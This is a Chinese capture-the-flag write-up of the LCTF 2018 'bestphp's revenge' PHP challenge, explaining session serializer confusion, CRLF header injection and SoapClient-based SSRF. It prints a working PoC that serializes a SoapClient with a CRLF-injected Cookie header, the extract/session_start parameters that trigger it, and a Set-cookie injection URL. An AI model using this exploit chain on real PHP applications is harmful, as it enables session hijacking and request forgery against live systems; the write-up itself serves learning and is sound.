[LCTF]bestphp's revenge 给我的启发学习
bestphp's revenge
flag.php: only localhost can get flag!sessionstart(); echo 'only localhost can get flag!'; $flag = 'LCTF{*************************}'; if($SERVER["REMOTEADDR"]==="127.0.0.1"){ $SESSION['flag'] = $flag; } only localhost can get flag!
这里可能就给我们提供了一种可能就是ssrf攻击,利用ssrf来获取flag。 index.php:
<?php
//index.php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET[f],$_POST);
session_start();
if(isset($_GET[name])){
$_SESSION[name] = $_GET[name];
}
var_dump($_SESSION);
$a = array(reset($_SESSION),'welcome_to_the_lctf2018');
call_user_func($b,$a);
?>
在这里call_user_func
是回调函数,她把第一个参数作为回调函数调用,后面的就是跟着传入的参数。
同时题目告诉我们要进行反序列化,但是刚开始没有看到反序列化的点。
在这里我们回调的函数可以是php的内置函数。而反序列化的点在于session。
关于session反序列化的前提点
也算我复习一遍吧,之前用过sess这个文件写过一些东西:
设定用户自定义存储函数(session.save_handler):
[Session]
; Handler used to store/retrieve data.
; http://php.net/session.save-handler
session.save_handler = files
设置session的存储路径(session.save_path):
; does not overwrite the process's umask.
; http://php.net/session.save-path
session.save_path="D:\phpstudy_pro\Extensions\tmp\tmp"
设置反序列化处理器:(session.serialize_handler):
; Handler used to serialize data. php is the standard serializer of PHP.
; http://php.net/session.serialize-handler
session.serialize_handler = php
包含了三种处理器,这里默认为php。他们分别是php,phpserialize 以及phpbinary。
session存储文件,以及三种反序列化引擎返回的不同结果
关于php当中的session:以sess_sessionid
命名,有时候他是有安全隐患的,他用来存储session,这是我随便找的一个sess文件
dvwa|a:2:{s:8:"messages";a:0:{}s:8:"username";s:5:"admin";}session_token|s:32:"5c65a3e35629581c240bf568c46b8df2";
注意用不同的反序列化引擎进行序列化得到的结果是不同的: php_serialize引擎序列化:
name|s:6:"spoock";
其中,s:6:"spoock"是经过serialize之后得到的 php引擎进行序列化: dvwa|a:2:{s:8:"messages";a:0:{}s:8:"username";s:5:"admin";}session_token|s:32:"5c65a3e35629581c240bf568c46b8df2";
php_binary引擎进行反序列化:
<0x04>usernames:5:"admin";
当序列化的引擎和反序列化的引擎不一致时,就可以利用引擎之间的差异产生序列化注入漏洞。
以下示例来自参考文章:https://www.tinymind.net.cn/articles/f270436cb6b916
我们传入$_SESSION['name']='|O:5:"Smi1e":1:{s:4:"test";s:3:"AAA";}';
当我们序列化引擎使用:php_serialize
:
在session文件中存储内容就为:a:1:{s:4:"name";s:5:"|O:5:"Smi1e":1:{s:4:"test";s:3:"AAA";}";}
而此时利用反序列化引擎为php的时候,|就为键与值的分界线。
此时键名为a:1:{s:4:"name";s:5:"
键值为:O:5:"Smi1e":1:{s:4:"test";s:3:"AAA";}
这里就形成了注入点,因为键值valude会再进行一次serialize反序列化,所以就会执行生成一个新的smile对象而我们在php引擎中进行这样的序列化,显然是不可能的,我们无法控制参数。
到了这步,此时我们已经完成了一个Smile对象的注入。
crlf漏洞
在HTTP协议中,HTTP header与HTTP Body是用两个CRLF分隔的,即回车加换行\r\n
,此时我们控制header头,注入换行符,就能注入一些代码,或者其他的比如cookie,所以CRLF漏洞常常出现在Location与Set-cookie消息头中。
关于crlf:
cr:回车符:光标移到行首 : %0d
lf:换行符:光标垂直移到下行 :%0a
就例如在windows我们编写字典的时候加的其实是\r\n
,在linux当中则是\n
。
具体构造方法:在url参数处进行构造即:http://url?xx=hhh%0d%0aSet-cookie:sessionid=test
可以查看一下响应头,看看有没有被返回显示出来。
造成这种问题的原因是因为这两个字符的不完全过滤,以及后端的代码编写方式,例如:header("Location:".$_GET["URL"]); 这样拼接到Location后面并且进行了换行,Set-Cookie就出来了.
index.php页面的分析:
<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET[f],$_POST);
session_start();
if(isset($_GET[name])){
$_SESSION[name] = $_GET[name];
}
var_dump($_SESSION);
$a = array(reset($_SESSION),'welcome_to_the_lctf2018');
call_user_func($b,$a);
?>
注意这个回调函数,这里导致的就可能是变量覆盖了,我们利用extract函数,对于$b这里是可以进行变量覆盖的,他的功能、将变量导入到当前的符号表。
即?f=extract POST:b=XXXX目标函数。
同时我们可以利用回调函数来设置反序列化的解释器。
即?f=session_start POST:serialize_handler=php_serialize
这里为什么不能把b覆盖为unserialize函数是有原因的,因为$a为数组,而unserialize无法处理数组。所以这里我们通过call_user_func
来设置session.serialize_handler
,接着通过默认引擎来触发反序列化。
所以结合完这个函数就应该变成session_start(['serialize_handler'=>'php_serialize'])
我们前面已经介绍了php这个序列化引擎会以|作为作为key和value的分隔符。并且当php引擎与php_serialize放到一起处理的时候,会有异常,利用这个特性。
在这道题环境中我们只要在name上以|开头后面跟上我们真正要反序列化的内容,就是我们注入的点。
此时我们协同着传入我们的payload:
这是poc:
<?php
$target = "http://127.0.0.1/flag.php";
$attack = new SoapClient(null,array('location' => $target,
'user_agent' => "test\r\nCookie: PHPSESSID=96sujaq7o5tl0btee8urnlsrb3\r\n",
'uri' => "123"));
$payload = urlencode(serialize($attack));
echo $payload;
关于poc的生成以及作用:
这段poc,利用到了crlf,在这里能够将我们设置的这段cookie\r\nCookie: PHPSESSID=96sujaq7o5tl0btee8urnlsrb3\r\n
变成实体写入进去,能够dump出来,就是设置了我们的cookie,能用来进行ssrf。
此时我们利用crlf伪造了请求,访问flag,结果保存到了96sujaq7o5tl0btee8urnlsrb3这段cookie文件中
原生类soap的利用
SOAP是webService三要素。
SOAP(简单对象访问协议)是连接或Web服务或客户端和Web服务之间的接口,其采用HTTP作为底层通讯协议,XML作为数据传送的格式。
我们可以通过它来发送http/https请求,同时WSDL(WebServicesDescriptionLanguage)WSDL 用来描述如何访问具体的接口,他也是三要素之一。
而SoapClient类可以创建soap数据报文,与wsdl接口进行交互。
SOAP的组成
一个包含有一个必需的 SOAP 的封装包,一个可选的 SOAP 标头和一个必需的 SOAP 体块的 XML 文档。
<?xml
version="1.0"?>
<soap:Envelope
xmlns:soap="http://www.w3.org/2001/12/soap-envelope"
soap:encodingStyle="http://www.w3.org/2001/12/soap-encoding">
<soap:Header>
</soap:Header>
<soap:Body>
<soap:Fault>
</soap:Fault>
</soap:Body>
</soap:Envelope>
在PHP中,PHP的 SOAP 扩展可以用来提供和使用 Web Services。
拓展实现了流各类,分别为SoapClient、SoapServer 、SoapFault、SoapHeader、SoapParam 以及 SoapVar。
在soapclient类中存在着CRLF漏洞,因为在soapclient中他允许我们自定义User-Agent,通过对User-Agent的控制,我们能够控制更多的参数,对他们进行覆盖。
此处参考文章:https://www.anquanke.com/post/id/153065#h2-5
利用变量覆盖继续
burp截包:
触发反序列化
此时我们利用变量覆盖,去进行反序列化的出发点。
这里我们出触发反序列化的姿势,就是利用变量覆盖,将b覆盖为call_user_func()
。
关于reset函数:reset() 函数将内部指针指向数组中的第一个元素,并输出。
在这里就相当于$_SESSION['name']
,此时我们根据我们上一步传入的结果,最终call_user_func($b, $a)
就变为了:call_user_func(array('SoapClient','welcome_to_the_lctf2018'))
即call_user_func(SoapClient->welcome_to_the_lctf2018)
但是welcome_to_the_lctf2018
是不存在这个方法的,所以就触发了魔术方法__call()
,从而发出请求。
此时触发反序列化使SoapClient发送请求,向flag.php发起了请求,。
读取flag
此时对于flag的读取就非常简单了,我们利用我们设置的cookie去访问网页,session文件的内容就被dump出来了。
在flag.php当中:
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
$_SESSION['flag'] = $flag;
}
即var_dump($_SESSION);
参考文章:
https://blog.spoock.com/2016/10/16/php-serialize-problem/
[LCTF]bestphp's revenge 给我的启发学习的更多相关文章
- 刷题记录:[LCTF]bestphp's revenge
目录 刷题记录:[LCTF]bestphp's revenge 一.知识点 1.SoapClient触发反序列化导致ssrf 2.serialize_hander处理session方式不同导致sess ...
- bestphp's revenge
0x00 知识点 1利用PHP原生类来构造POP链 本题没有可以利用的类,没有可以利用的类就找不到POP链所以只能考虑PHP原生类 我们先来解释一下什么是POP链 POP:面向属性编程 在二进制利用时 ...
- 刷题[bestphp's revenge]
前置知识 phpsession反序列化 CRLF注入 即:利用漏洞,注入一个CRLF(\r\n)控制用户的Cookie,或者注入两个CRLF,控制返回给客户端的主体 php内置SoapClient类利 ...
- LCTF wp简单复现
1.T4lk 1s ch34p,sh0w m3 the sh31l 代码如下: <?php $SECRET = `../read_secret`; $SANDBOX = "../dat ...
- BUU刷题01
[安洵杯 2019]easy_serialize_php 直接给了源代码 <?php $function = @$_GET['f']; function filter($img){ $filte ...
- JavaSE中Collection集合框架学习笔记(2)——拒绝重复内容的Set和支持队列操作的Queue
前言:俗话说“金三银四铜五”,不知道我要在这段时间找工作会不会很艰难.不管了,工作三年之后就当给自己放个暑假. 面试当中Collection(集合)是基础重点.我在网上看了几篇讲Collection的 ...
- 计算机协议、标准以及OSI模型的简单介绍
由概念启发学习,引导学习.本篇文章中包含了一些最基本的概念和底层知识.虽然零碎,但是这是基础. 一.协议和标准 协议指的是一组控制数据通信的规则.协议有三要素:语法(syntax),语义(semant ...
- HDU 3341 Lost's revenge(AC自动机+DP)
Lost's revenge Time Limit: 15000/5000 MS (Java/Others) Memory Limit: 65535/65535 K (Java/Others)T ...
- HDU 5019 Revenge of GCD(数学)
题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=5019 Problem Description In mathematics, the greatest ...
随机推荐
- centos yum 安装golang
rpm -Uvh http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm yum install golan ...
- 斗地主小游戏随机发牌PHP代码
<?php header("Content-Type:text/html;charset=UTF-8"); $num=['A','2','3','4','5','6','7' ...
- [转]camera的构成
camera的构成 拍摄景物通过镜头,将生成的光学图像投射到传感器上,然后光学图像被转换成电信号,电信号再经过模数转换变为数字信号,数字信号经过DSP加工处理,再被送到电脑中进行处理,最终转换成手机屏 ...
- Clayff力场(转载)
本文转载自:http://blog.sina.com.cn/s/blog_b48a7ac30102w4km.html 注意:lammps中并没有完整的clayff势函数,需要将一下三者结合使用. an ...
- Oracle数据库教程-数据定义语言(表操作)
创建表 建表语法: CREATE TABLE 表名 ( 列1 数据类型 [primary key], 列2 数据类型 default 默认值 [not null], …, constraint 约束名 ...
- html行内块元素之间的缝隙
关于html行内块元素之间缝隙的那点儿事情 事情是这样子的,我起初打算验证使用transform属性的标签是否会影响其他的标签的布局,于是写了下面一段代码: <!DOCTYPE html> ...
- 安装oracleXE快捷版(二)
-bash-3.2$ 是oracle用户下的提示符 [root@localhost ~]# 是root用户下的提示符 #用root去修改oracle用户的密码123456[root@localhost ...
- Mybatis通用Join的实现(最终版)
你是否还在为mybatis的多表关联查询而写xml烦恼,是否还在为动态组装查询条件烦恼,是否还在为此没有合适的解决方案烦恼? mybatis-extension插件,解决开发过程中需要多表关联时需手写 ...
- IO优化
Linux性能优化之CPU.内存.IO优化 https://blog.csdn.net/zyc88888/article/details/79027944 iOS的I/O操作 https://www. ...
- POJ - 3037-Skiing(邻接表+Dijkstra)
Bessie and the rest of Farmer John's cows are taking a trip this winter to go skiing. One day Bessie ...